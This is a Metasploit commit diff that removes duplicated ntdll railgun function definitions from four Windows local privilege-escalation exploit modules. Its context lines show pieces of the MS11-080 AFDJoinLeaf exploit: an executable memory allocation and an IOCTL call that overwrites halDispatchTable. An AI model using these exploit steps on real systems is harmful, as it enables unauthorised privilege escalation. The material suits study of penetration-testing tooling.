Land rapid7#2762 - Use new ntdll railgun functions

Author: wchen-r7

modules/exploits/windows/local/ms11_080_afdjoinleaf.rb

@@ -172,19 +172,6 @@ def exploit
     irpstuff << rand_text_alpha(231)
 
     if not this_proc.memory.writable?(0x1000)
-      session.railgun.add_function(
-        'ntdll',
-        'NtAllocateVirtualMemory',
-        'DWORD',
-        [
-          ["DWORD", "ProcessHandle", "in"],
-          ["PBLOB", "BaseAddress", "inout"],
-          ["PDWORD", "ZeroBits", "in"],
-          ["PBLOB", "RegionSize", "inout"],
-          ["DWORD", "AllocationType", "in"],
-          ["DWORD", "Protect", "in"]
-        ])
-
       result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
     end
     if not this_proc.memory.writable?(0x1000)
@@ -261,31 +248,6 @@ def exploit
       return
     end
 
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ]
-      ])
-
     print_status("Triggering AFDJoinLeaf pointer overwrite...")
     result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

modules/exploits/windows/local/ms_ndproxy.rb

@@ -87,44 +87,6 @@ module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In o
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',

modules/exploits/windows/local/novell_client_nicm.rb

@@ -67,44 +67,6 @@ def initialize(info={})
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',

modules/exploits/windows/local/novell_client_nwfs.rb

@@ -63,44 +63,6 @@ def initialize(info={})
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',